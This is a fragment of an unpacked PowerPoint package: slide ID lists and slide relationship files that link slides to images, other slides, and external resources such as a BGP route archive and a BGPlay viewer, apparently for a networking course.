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753" r:id="rId35"/>
    <p:sldId id="419" r:id="rId36"/>
    <p:sldId id="400" r:id="rId37"/>
    <p:sldId id="559" r:id="rId38"/>
    <p:sldId id="674" r:id="rId39"/>
    <p:sldId id="558" r:id="rId40"/>
    <p:sldId id="561" r:id="rId41"/>
    <p:sldId id="560" r:id="rId42"/>
    <p:sldId id="568" r:id="rId43"/>
    <p:sldId id="562" r:id="rId44"/>
    <p:sldId id="687" r:id="rId45"/>
    <p:sldId id="689" r:id="rId46"/>
    <p:sldId id="417" r:id="rId47"/>
    <p:sldId id="263" r:id="rId48"/>
    <p:sldId id="572" r:id="rId49"/>
    <p:sldId id="260" r:id="rId50"/>
    <p:sldId id="450" r:id="rId51"/>
    <p:sldId id="449" r:id="rId52"/>
    <p:sldId id="270" r:id="rId53"/>
    <p:sldId id="271" r:id="rId54"/>
    <p:sldId id="272" r:id="rId55"/>
    <p:sldId id="273" r:id="rId56"/>
    <p:sldId id="385" r:id="rId57"/>
    <p:sldId id="603" r:id="rId58"/>
    <p:sldId id="279" r:id="rId59"/>
    <p:sldId id="280" r:id="rId60"/>
    <p:sldId id="281" r:id="rId61"/>
    <p:sldId id="282" r:id="rId62"/>
    <p:sldId id="386" r:id="rId63"/>
    <p:sldId id="387" r:id="rId64"/>
    <p:sldId id="388" r:id="rId65"/>
    <p:sldId id="389" r:id="rId66"/>
    <p:sldId id="390" r:id="rId67"/>
    <p:sldId id="391" r:id="rId68"/>
    <p:sldId id="392" r:id="rId69"/>
    <p:sldId id="393" r:id="rId70"/>
    <p:sldId id="601" r:id="rId71"/>
    <p:sldId id="605" r:id="rId72"/>
    <p:sldId id="606" r:id="rId73"/>
    <p:sldId id="604" r:id="rId74"/>
    <p:sldId id="612" r:id="rId75"/>
    <p:sldId id="613" r:id="rId76"/>
    <p:sldId id="602" r:id="rId77"/>
    <p:sldId id="616" r:id="rId78"/>
    <p:sldId id="614" r:id="rId79"/>
    <p:sldId id="615" r:id="rId80"/>
    <p:sldId id="756" r:id="rId81"/>
    <p:sldId id="757" r:id="rId82"/>
    <p:sldId id="758" r:id="rId83"/>
    <p:sldId id="402" r:id="rId84"/>
    <p:sldId id="410" r:id="rId85"/>
    <p:sldId id="411" r:id="rId86"/>
    <p:sldId id="406" r:id="rId87"/>
    <p:sldId id="403" r:id="rId88"/>
    <p:sldId id="414" r:id="rId89"/>
    <p:sldId id="415" r:id="rId90"/>
    <p:sldId id="416" r:id="rId91"/>
    <p:sldId id="512" r:id="rId92"/>
    <p:sldId id="513" r:id="rId93"/>
    <p:sldId id="409" r:id="rId94"/>
    <p:sldId id="405" r:id="rId95"/>
    <p:sldId id="407" r:id="rId96"/>
    <p:sldId id="404" r:id="rId97"/>
    <p:sldId id="514" r:id="rId98"/>
    <p:sldId id="515" r:id="rId99"/>
    <p:sldId id="570" r:id="rId100"/>
    <p:sldId id="571" r:id="rId101"/>
    <p:sldId id="607" r:id="rId102"/>
    <p:sldId id="608" r:id="rId103"/>
    <p:sldId id="435" r:id="rId104"/>
    <p:sldId id="516" r:id="rId105"/>
    <p:sldId id="685" r:id="rId106"/>
    <p:sldId id="437" r:id="rId107"/>
    <p:sldId id="527" r:id="rId108"/>
    <p:sldId id="528" r:id="rId109"/>
    <p:sldId id="529" r:id="rId110"/>
    <p:sldId id="530" r:id="rId111"/>
    <p:sldId id="518" r:id="rId112"/>
    <p:sldId id="519" r:id="rId113"/>
    <p:sldId id="520" r:id="rId114"/>
    <p:sldId id="521" r:id="rId115"/>
    <p:sldId id="439" r:id="rId116"/>
    <p:sldId id="522" r:id="rId117"/>
    <p:sldId id="523" r:id="rId118"/>
    <p:sldId id="525" r:id="rId119"/>
    <p:sldId id="440" r:id="rId120"/>
    <p:sldId id="442" r:id="rId121"/>
    <p:sldId id="443" r:id="rId122"/>
    <p:sldId id="541" r:id="rId123"/>
    <p:sldId id="544" r:id="rId124"/>
    <p:sldId id="543" r:id="rId125"/>
    <p:sldId id="546" r:id="rId126"/>
    <p:sldId id="547" r:id="rId127"/>
    <p:sldId id="542" r:id="rId128"/>
    <p:sldId id="438" r:id="rId129"/>
    <p:sldId id="531" r:id="rId130"/>
    <p:sldId id="532" r:id="rId131"/>
    <p:sldId id="533" r:id="rId132"/>
    <p:sldId id="534" r:id="rId133"/>
    <p:sldId id="535" r:id="rId134"/>
    <p:sldId id="536" r:id="rId135"/>
    <p:sldId id="537" r:id="rId136"/>
    <p:sldId id="436" r:id="rId137"/>
    <p:sldId id="551" r:id="rId138"/>
    <p:sldId id="693" r:id="rId139"/>
    <p:sldId id="692" r:id="rId140"/>
    <p:sldId id="549" r:id="rId141"/>
    <p:sldId id="538" r:id="rId142"/>
    <p:sldId id="539" r:id="rId143"/>
    <p:sldId id="686" r:id="rId144"/>
    <p:sldId id="540" r:id="rId145"/>
    <p:sldId id="575" r:id="rId146"/>
    <p:sldId id="574" r:id="rId147"/>
    <p:sldId id="576" r:id="rId148"/>
    <p:sldId id="577" r:id="rId149"/>
    <p:sldId id="578" r:id="rId150"/>
    <p:sldId id="579" r:id="rId151"/>
    <p:sldId id="550" r:id="rId152"/>
    <p:sldId id="684" r:id="rId153"/>
    <p:sldId id="548" r:id="rId154"/>
    <p:sldId id="526" r:id="rId155"/>
    <p:sldId id="690" r:id="rId156"/>
    <p:sldId id="694" r:id="rId157"/>
    <p:sldId id="695" r:id="rId158"/>
    <p:sldId id="696" r:id="rId159"/>
    <p:sldId id="609" r:id="rId160"/>
    <p:sldId id="610" r:id="rId161"/>
    <p:sldId id="611" r:id="rId162"/>
    <p:sldId id="617" r:id="rId163"/>
    <p:sldId id="618" r:id="rId164"/>
    <p:sldId id="460" r:id="rId165"/>
    <p:sldId id="552" r:id="rId166"/>
    <p:sldId id="462" r:id="rId167"/>
    <p:sldId id="463" r:id="rId168"/>
    <p:sldId id="467" r:id="rId169"/>
    <p:sldId id="469" r:id="rId170"/>
    <p:sldId id="476" r:id="rId171"/>
    <p:sldId id="475" r:id="rId172"/>
    <p:sldId id="478" r:id="rId173"/>
    <p:sldId id="477" r:id="rId174"/>
    <p:sldId id="479" r:id="rId175"/>
    <p:sldId id="480" r:id="rId176"/>
    <p:sldId id="466" r:id="rId177"/>
    <p:sldId id="464" r:id="rId178"/>
    <p:sldId id="471" r:id="rId179"/>
    <p:sldId id="470" r:id="rId180"/>
    <p:sldId id="473" r:id="rId181"/>
    <p:sldId id="474" r:id="rId182"/>
    <p:sldId id="483" r:id="rId183"/>
    <p:sldId id="481" r:id="rId184"/>
    <p:sldId id="472" r:id="rId185"/>
    <p:sldId id="484" r:id="rId186"/>
    <p:sldId id="486" r:id="rId187"/>
    <p:sldId id="493" r:id="rId188"/>
    <p:sldId id="487" r:id="rId189"/>
    <p:sldId id="490" r:id="rId190"/>
    <p:sldId id="489" r:id="rId191"/>
    <p:sldId id="500" r:id="rId192"/>
    <p:sldId id="491" r:id="rId193"/>
    <p:sldId id="488" r:id="rId194"/>
    <p:sldId id="482" r:id="rId195"/>
    <p:sldId id="497" r:id="rId196"/>
    <p:sldId id="498" r:id="rId197"/>
    <p:sldId id="501" r:id="rId198"/>
    <p:sldId id="496" r:id="rId199"/>
    <p:sldId id="505" r:id="rId200"/>
    <p:sldId id="503" r:id="rId201"/>
    <p:sldId id="502" r:id="rId202"/>
    <p:sldId id="509" r:id="rId203"/>
    <p:sldId id="510" r:id="rId204"/>
    <p:sldId id="506" r:id="rId205"/>
    <p:sldId id="511" r:id="rId206"/>
    <p:sldId id="485" r:id="rId207"/>
    <p:sldId id="620" r:id="rId208"/>
    <p:sldId id="621" r:id="rId209"/>
    <p:sldId id="623" r:id="rId210"/>
    <p:sldId id="625" r:id="rId211"/>
    <p:sldId id="622" r:id="rId212"/>
    <p:sldId id="627" r:id="rId213"/>
    <p:sldId id="626" r:id="rId214"/>
    <p:sldId id="624" r:id="rId215"/>
    <p:sldId id="751" r:id="rId216"/>
    <p:sldId id="669" r:id="rId217"/>
    <p:sldId id="670" r:id="rId218"/>
    <p:sldId id="752" r:id="rId219"/>
    <p:sldId id="671" r:id="rId220"/>
    <p:sldId id="755" r:id="rId221"/>
    <p:sldId id="759" r:id="rId222"/>
    <p:sldId id="675" r:id="rId223"/>
    <p:sldId id="664" r:id="rId224"/>
    <p:sldId id="665" r:id="rId225"/>
    <p:sldId id="666" r:id="rId226"/>
    <p:sldId id="667" r:id="rId227"/>
    <p:sldId id="668" r:id="rId228"/>
    <p:sldId id="660" r:id="rId229"/>
    <p:sldId id="659" r:id="rId230"/>
    <p:sldId id="658" r:id="rId231"/>
    <p:sldId id="661" r:id="rId232"/>
    <p:sldId id="663" r:id="rId233"/>
    <p:sldId id="648" r:id="rId234"/>
    <p:sldId id="647" r:id="rId235"/>
    <p:sldId id="649" r:id="rId236"/>
    <p:sldId id="650" r:id="rId237"/>
    <p:sldId id="651" r:id="rId238"/>
    <p:sldId id="652" r:id="rId239"/>
    <p:sldId id="653" r:id="rId240"/>
    <p:sldId id="654" r:id="rId241"/>
    <p:sldId id="656" r:id="rId242"/>
    <p:sldId id="655" r:id="rId243"/>
    <p:sldId id="657" r:id="rId244"/>
    <p:sldId id="744" r:id="rId245"/>
    <p:sldId id="742" r:id="rId246"/>
    <p:sldId id="745" r:id="rId247"/>
    <p:sldId id="746" r:id="rId248"/>
    <p:sldId id="743" r:id="rId249"/>
    <p:sldId id="749" r:id="rId250"/>
    <p:sldId id="748" r:id="rId251"/>
    <p:sldId id="747" r:id="rId252"/>
    <p:sldId id="750" r:id="rId253"/>
    <p:sldId id="284" r:id="rId254"/>
    <p:sldId id="285" r:id="rId255"/>
    <p:sldId id="286" r:id="rId256"/>
    <p:sldId id="355" r:id="rId257"/>
    <p:sldId id="291" r:id="rId258"/>
    <p:sldId id="288" r:id="rId259"/>
    <p:sldId id="292" r:id="rId260"/>
    <p:sldId id="293" r:id="rId261"/>
    <p:sldId id="294" r:id="rId262"/>
    <p:sldId id="297" r:id="rId263"/>
    <p:sldId id="298" r:id="rId264"/>
    <p:sldId id="299" r:id="rId265"/>
    <p:sldId id="300" r:id="rId266"/>
    <p:sldId id="301" r:id="rId267"/>
    <p:sldId id="302" r:id="rId268"/>
    <p:sldId id="303" r:id="rId269"/>
    <p:sldId id="304" r:id="rId270"/>
    <p:sldId id="553" r:id="rId271"/>
    <p:sldId id="554" r:id="rId272"/>
    <p:sldId id="305" r:id="rId273"/>
    <p:sldId id="306" r:id="rId274"/>
    <p:sldId id="555" r:id="rId275"/>
    <p:sldId id="557" r:id="rId276"/>
    <p:sldId id="556" r:id="rId277"/>
    <p:sldId id="307" r:id="rId278"/>
    <p:sldId id="308" r:id="rId279"/>
    <p:sldId id="309" r:id="rId280"/>
    <p:sldId id="310" r:id="rId281"/>
    <p:sldId id="315" r:id="rId282"/>
    <p:sldId id="316" r:id="rId283"/>
    <p:sldId id="317" r:id="rId284"/>
    <p:sldId id="311" r:id="rId285"/>
    <p:sldId id="312" r:id="rId286"/>
    <p:sldId id="313" r:id="rId287"/>
    <p:sldId id="314" r:id="rId288"/>
    <p:sldId id="318" r:id="rId289"/>
    <p:sldId id="319" r:id="rId290"/>
    <p:sldId id="320" r:id="rId291"/>
    <p:sldId id="321" r:id="rId292"/>
    <p:sldId id="322" r:id="rId293"/>
    <p:sldId id="323" r:id="rId294"/>
    <p:sldId id="324" r:id="rId295"/>
    <p:sldId id="326" r:id="rId296"/>
    <p:sldId id="327" r:id="rId297"/>
    <p:sldId id="328" r:id="rId298"/>
    <p:sldId id="329" r:id="rId299"/>
    <p:sldId id="330" r:id="rId300"/>
    <p:sldId id="331" r:id="rId301"/>
    <p:sldId id="332" r:id="rId302"/>
    <p:sldId id="333" r:id="rId303"/>
    <p:sldId id="334" r:id="rId304"/>
    <p:sldId id="335" r:id="rId305"/>
    <p:sldId id="336" r:id="rId306"/>
    <p:sldId id="337" r:id="rId307"/>
    <p:sldId id="338" r:id="rId308"/>
    <p:sldId id="339" r:id="rId309"/>
    <p:sldId id="340" r:id="rId310"/>
    <p:sldId id="341" r:id="rId311"/>
    <p:sldId id="342" r:id="rId312"/>
    <p:sldId id="343" r:id="rId313"/>
    <p:sldId id="344" r:id="rId314"/>
    <p:sldId id="345" r:id="rId315"/>
    <p:sldId id="346" r:id="rId316"/>
    <p:sldId id="347" r:id="rId317"/>
    <p:sldId id="348" r:id="rId318"/>
    <p:sldId id="349" r:id="rId319"/>
    <p:sldId id="350" r:id="rId320"/>
    <p:sldId id="351" r:id="rId321"/>
    <p:sldId id="352" r:id="rId322"/>
    <p:sldId id="353" r:id="rId323"/>
    <p:sldId id="354" r:id="rId324"/>
    <p:sldId id="356" r:id="rId325"/>
    <p:sldId id="357" r:id="rId326"/>
    <p:sldId id="358" r:id="rId327"/>
    <p:sldId id="359" r:id="rId328"/>
    <p:sldId id="360" r:id="rId329"/>
    <p:sldId id="580" r:id="rId330"/>
    <p:sldId id="619" r:id="rId331"/>
    <p:sldId id="581" r:id="rId332"/>
    <p:sldId id="582" r:id="rId333"/>
    <p:sldId id="631" r:id="rId334"/>
    <p:sldId id="628" r:id="rId335"/>
    <p:sldId id="629" r:id="rId336"/>
    <p:sldId id="630" r:id="rId337"/>
    <p:sldId id="697" r:id="rId338"/>
    <p:sldId id="699" r:id="rId339"/>
    <p:sldId id="700" r:id="rId340"/>
    <p:sldId id="698" r:id="rId341"/>
    <p:sldId id="632" r:id="rId342"/>
    <p:sldId id="702" r:id="rId343"/>
    <p:sldId id="703" r:id="rId344"/>
    <p:sldId id="707" r:id="rId345"/>
    <p:sldId id="701" r:id="rId346"/>
    <p:sldId id="633" r:id="rId347"/>
    <p:sldId id="634" r:id="rId348"/>
    <p:sldId id="708" r:id="rId349"/>
    <p:sldId id="704" r:id="rId350"/>
    <p:sldId id="705" r:id="rId351"/>
    <p:sldId id="706" r:id="rId352"/>
    <p:sldId id="710" r:id="rId353"/>
    <p:sldId id="711" r:id="rId354"/>
    <p:sldId id="712" r:id="rId355"/>
    <p:sldId id="709" r:id="rId356"/>
    <p:sldId id="713" r:id="rId357"/>
    <p:sldId id="714" r:id="rId358"/>
    <p:sldId id="729" r:id="rId359"/>
    <p:sldId id="728" r:id="rId360"/>
    <p:sldId id="731" r:id="rId361"/>
    <p:sldId id="727" r:id="rId362"/>
    <p:sldId id="730" r:id="rId363"/>
    <p:sldId id="732" r:id="rId364"/>
    <p:sldId id="733" r:id="rId365"/>
    <p:sldId id="734" r:id="rId366"/>
    <p:sldId id="737" r:id="rId367"/>
    <p:sldId id="738" r:id="rId368"/>
    <p:sldId id="739" r:id="rId369"/>
    <p:sldId id="736" r:id="rId370"/>
    <p:sldId id="735" r:id="rId371"/>
    <p:sldId id="740" r:id="rId372"/>
    <p:sldId id="741" r:id="rId373"/>
    <p:sldId id="718" r:id="rId374"/>
    <p:sldId id="720" r:id="rId375"/>
    <p:sldId id="721" r:id="rId376"/>
    <p:sldId id="723" r:id="rId377"/>
    <p:sldId id="719" r:id="rId378"/>
    <p:sldId id="715" r:id="rId379"/>
    <p:sldId id="716" r:id="rId380"/>
    <p:sldId id="717" r:id="rId381"/>
    <p:sldId id="724" r:id="rId382"/>
    <p:sldId id="725" r:id="rId383"/>
    <p:sldId id="361" r:id="rId384"/>
    <p:sldId id="362" r:id="rId385"/>
    <p:sldId id="363" r:id="rId386"/>
    <p:sldId id="364" r:id="rId387"/>
    <p:sldId id="635" r:id="rId388"/>
    <p:sldId id="638" r:id="rId389"/>
    <p:sldId id="641" r:id="rId390"/>
    <p:sldId id="639" r:id="rId391"/>
    <p:sldId id="640" r:id="rId392"/>
    <p:sldId id="644" r:id="rId393"/>
    <p:sldId id="646" r:id="rId394"/>
    <p:sldId id="673" r:id="rId395"/>
    <p:sldId id="677" r:id="rId396"/>
    <p:sldId id="678" r:id="rId397"/>
    <p:sldId id="645" r:id="rId398"/>
    <p:sldId id="642" r:id="rId399"/>
    <p:sldId id="643" r:id="rId400"/>
    <p:sldId id="683" r:id="rId401"/>
    <p:sldId id="679" r:id="rId402"/>
    <p:sldId id="680" r:id="rId403"/>
    <p:sldId id="681" r:id="rId404"/>
    <p:sldId id="682" r:id="rId405"/>
    <p:sldId id="432" r:id="rId406"/>
    <p:sldId id="433" r:id="rId407"/>
    <p:sldId id="434" r:id="rId408"/>
    <p:sldId id="423" r:id="rId409"/>
    <p:sldId id="563" r:id="rId410"/>
    <p:sldId id="592" r:id="rId411"/>
    <p:sldId id="564" r:id="rId412"/>
    <p:sldId id="565" r:id="rId413"/>
    <p:sldId id="586" r:id="rId414"/>
    <p:sldId id="587" r:id="rId415"/>
    <p:sldId id="588" r:id="rId416"/>
    <p:sldId id="589" r:id="rId417"/>
    <p:sldId id="590" r:id="rId418"/>
    <p:sldId id="591" r:id="rId419"/>
    <p:sldId id="593" r:id="rId420"/>
    <p:sldId id="594" r:id="rId421"/>
    <p:sldId id="595" r:id="rId422"/>
    <p:sldId id="596" r:id="rId423"/>
    <p:sldId id="597" r:id="rId424"/>
    <p:sldId id="598" r:id="rId425"/>
    <p:sldId id="599" r:id="rId426"/>
    <p:sldId id="600" r:id="rId427"/>
    <p:sldId id="583" r:id="rId428"/>
    <p:sldId id="584" r:id="rId429"/>
    <p:sldId id="585" r:id="rId430"/>
    <p:sldId id="566" r:id="rId431"/>
    <p:sldId id="268" r:id="rId432"/>
    <p:sldId id="365" r:id="rId433"/>
    <p:sldId id="366" r:id="rId434"/>
    <p:sldId id="507" r:id="rId435"/>
    <p:sldId id="296" r:id="rId436"/>
    <p:sldId id="290" r:id="rId43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753"/>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756"/>
            <p14:sldId id="757"/>
            <p14:sldId id="758"/>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751"/>
            <p14:sldId id="669"/>
            <p14:sldId id="670"/>
            <p14:sldId id="752"/>
            <p14:sldId id="671"/>
            <p14:sldId id="755"/>
            <p14:sldId id="759"/>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7" d="100"/>
          <a:sy n="117" d="100"/>
        </p:scale>
        <p:origin x="96" y="3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commentAuthors" Target="commentAuthor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presProps" Target="pres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2021-12-10</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2021-12-10</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31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide100.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slide" Target="slide106.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47.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide128.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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103.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123.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide107.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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide103.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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303.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31.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103.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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13.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slide" Target="slide10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14.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103.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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31.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1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0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slide" Target="slide103.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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2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303.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123.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31.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25.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1.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26.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1.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2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0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slide" Target="slide103.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide129.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image" Target="../media/image113.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-70.html" TargetMode="Externa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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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10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103.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132.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slide" Target="slide103.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42.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.jpeg"/></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slide" Target="slide103.xml"/><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46.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slide" Target="slide103.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide136.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide155.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.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slide" Target="slide47.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide141.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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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143.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4.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4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7.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide148.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slide" Target="slide431.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5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7.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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide154.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57.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8.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide158.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide136.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.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hyperlink" Target="../Content/ItCS/Block/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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166.jpe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26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide166.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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-55.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72.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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174.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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174.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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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177.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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-56.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8.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111.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-59.html" TargetMode="Externa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81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide181.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182.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88.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide183.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8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91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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87.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slide" Target="slide47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><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image" Target="../media/image193.jpeg"/><Relationship Id="rId16"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slide" Target="slide431.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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89.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193.jpe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11.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><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image" Target="../media/image216.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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19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image" Target="../media/image217.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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93.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9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9.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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1.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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19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9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199.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slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.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202.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0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20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20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29.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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31.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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4.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide326.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide166.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide197.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide268.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6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide182.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide176.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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hyperlink" Target="../Content/ItCS/calendar.php-108.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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1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21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1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217.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/BGPlay-master/run_bgplay.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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48.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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hyperlink" Target="http://archive.routeviews.org/bgpdata/2014.12/UPDATES/updates.20141222.0000.bz2" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.routeviews.org/bgpdata/2014.12/UPDATES/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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2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22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22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2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2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229.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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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63.jpeg"/></Relationships>
</file>

